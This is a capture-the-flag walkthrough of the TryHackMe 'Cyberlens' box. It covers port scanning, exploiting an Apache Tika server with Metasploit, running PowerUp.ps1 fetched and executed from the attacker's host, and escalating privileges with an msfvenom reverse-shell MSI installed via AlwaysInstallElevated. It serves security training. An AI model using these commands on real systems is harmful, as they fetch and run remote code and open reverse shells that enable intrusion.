Try Hack Me: Cyberlens

Today we are going to be looking at Cyberlens, easy rated box, on Try Hack Me. This box was created by a great mentor Tyler Rambsey, you can find his YouTube here https://www.youtube.com/@TylerRamsbey. A video walkthrough for this box will also be coming soon, you can find that here: https://www.youtube.com/@overgrowncarrot1.

Starting off as usual with a port scan, for this we are using rustscan we find the following ports, also we put cyberlens.thm into our /etc/hosts:

rustscan --ulimit 5000 10.10.244.35 -- -Pn

We notice that there is a lot of ports between 4xxxx and 5xxxx which is normal for windows due to RPC, however 6xxxx is not as normal. So before we will see what is running on 61777:

nmap -p 61777 -sC -sV cyberlens.thm -Pn -vv

Looks like we have an apache tika server. Using searchsploit we see the following:

searchsploit tika

msfconsole -q
search tika
use 0
set lhost tun0
set rhost cyberlens.thm
set rport 61777
run

Now we can drop into a shell and load powershell:

shell
powershell

From here we will put PowerUp.ps1 on the machine:

iex (iwr -usebasicparsing http://<tun0 IP>/PowerUp.ps1)
#make sure to use your own tunnel IP

From here running Invoke-Allchecks we see always install elevated.

To exploit this we can create a malicious msi file and then run it for a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=445 -f msi > shell.msi

#on windows

mkdir C:\Temp
cd C:\temp
wget http://<tun0 IP>/shell.msi -o shell.msi

Now we can run the shell.msi file, make sure you have listener running:

msiexec /quiet /qn /i C:\temp\shell.msi

Hopefully you enjoyed it.